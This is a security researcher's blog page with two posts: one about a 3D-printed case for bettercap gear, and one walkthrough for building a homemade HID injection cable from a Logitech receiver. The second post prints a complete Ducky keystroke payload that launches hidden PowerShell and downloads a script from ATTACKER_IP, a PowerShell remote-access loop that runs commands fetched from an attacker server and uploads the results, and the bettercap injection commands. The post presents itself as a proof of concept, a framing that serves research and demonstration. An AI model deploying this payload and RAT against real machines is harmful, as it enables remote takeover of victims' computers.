David Sopas – Web Security Researcher

crazyradio

27/08/20 Hardware , Tools # , , , , , ,

I printed a 3D box for my bettercap arsenal and I liked it

I printed a 3D box for my bettercap arsenal and I liked it

Looking at the title you might think that it’s Katy Perry new hit… It isn’t… I’m sorry…

One of my favourite tools when doing security assessments is bettercap. Its like “one tool to rule them all”. With that in mind, I needed something to carry my bettercap arsenal when going to a client. Using my self-taunted 3D skills (btw n00b level) I decided to design my own box.

I needed something to pack the following:

The first version I encounter some issues. It was too big; alfa card was a bit tight; lid didn’t closed correctly and not very appealing.

So I started working on my second version which I would reduce a bit by putting the slot for the two antennas (Alfa card and the CrazyRadio) and modify the BLE dongle slot to also reduce some space. Added 4 pinouts to better close the lid.

I was getting close of what I needed neitherless I wanted more specially because I had an hard time taking the antennas and the BLE dongle. Also, the pinouts were not a good option to accomodate the lid. So I decided to add a few things:

  • Small cuts to improve the removal of the antennas and the BLE dongle
  • New slot to put whatever I needed – you never know…
  • New lid that just slides into the box

And what about the lid? Besides helping to open – creating some friction –  its leet 🙂

If you are interested in printing it, I uploaded it to Thingiverse and feel free to ping me on Twitter for suggestions or modifications.

Have fun!

no responses
27/12/19 Hardware , Tips and Tricks # , , , , , ,

Gone in 30 seconds – a HID cable story tale

Gone in 30 seconds – a HID cable story tale

Following what I mentioned in my previous post, I went to my electronics bin and gathered a Logitech Wireless mouse (M185) and a USB cable.

On the mouse, I took the receiver – a Logitech Unifying Receiver CU0010 (nRF24L family):

And cut one of the sides of a random USB cable:

Split the wires:

Removed the cap from the Logitech receiver:

Solder (really need to improve my soldering skills) the wires (GND, Data+, Data- and VCC) into the receiver:

Put the USB connector cap on:

Add a nice plastic USB enclosure to make it more real:

All the process was fast, I took around 5 minutes to cut, solder and super-glue all together. In the end I think it could be better, specially when I rammed the USB connector with a knife.

For the second part it took a little more because I wanted to use another alternative to the existing HID cables – so I went with CrazyRadio + Bastille firmware and a final touch of bettercap HID module to send my Ducky payload. I wanted to take advantage of what I had and that’s it.

This is basically a walkthrough of what I did:

  • Write down the MAC address of the device (using HID.recon from bettercap or by checking the properties of the device – this will depend on your OS)
  • Write your Ducky payload – in this PoC is just a reverse shell to my VPS
DELAY 750
GUI r
DELAY 500
STRING cmd
ENTER
DELAY 500
STRING powershell -NoP -NonI -Exec Bypass -W hidden "IEX (New-Object System.Net.WebClient).DownloadString('http://ATTACKER_IP/ps.txt')"
ENTER
DELAY 750
function getUser() {
    $string = ([System.Security.Principal.WindowsIdentity]::GetCurrent().Name) | Out-String
    $string = $string.Trim()
    return $string
}
 
function getComputerName() {
    $string = (Get-WmiObject Win32_OperatingSystem).CSName | Out-String
    $string = $string.Trim()
    return $string
}
 
$resp = "http://ATTACKER_IP:8000/rat"
$w = New-Object Net.WebClient
while($true) {
    [System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true}
    $r_get = $w.DownloadString($resp)
    $d = [System.Convert]::FromBase64String($r_get);
    $Ds = [System.Text.Encoding]::UTF8.GetString($d);
 
    while($r_get) {
        $output = invoke-expression $Ds | out-string
        $w.UploadString($resp, $output)
        break
    }
}
  • Connect the HID cable on the Windows victim machine (don’t forget that the payload will be OS dependable)
  • Start your listener on the attacker machine
  • Connect CrazyRadio and start bettercap
bettercap -eval="hid.recon on"
hid.inject MAC PT ducky.txt

And its basically game-over.
I did a short video to illustrate the PoC – https://www.youtube.com/watch?v=y9C-4bcgmIU.

In the process of creating this HID cable with “leftovers” I learn a few things:

  • Some Logitech Unifying receivers are not vulnerable to some known attacks – like keystroke injection;
  • Be careful when putting solder on the USB contacts. Just put a small amount and spread it slightly with your iron, that way the PCB will fit better on the USB connector;
  • Do a first run on a USB hub just to make sure you don’t burn your laptop port or something;
  • Don’t waste money buying expensive HID cables (specially when ripped from others) when you can make your own for less that $10;
  • Last point, don’t keep your brain focused on doing what others do and don’t be afraid do fail at first. Be persistent and never quit.
no responses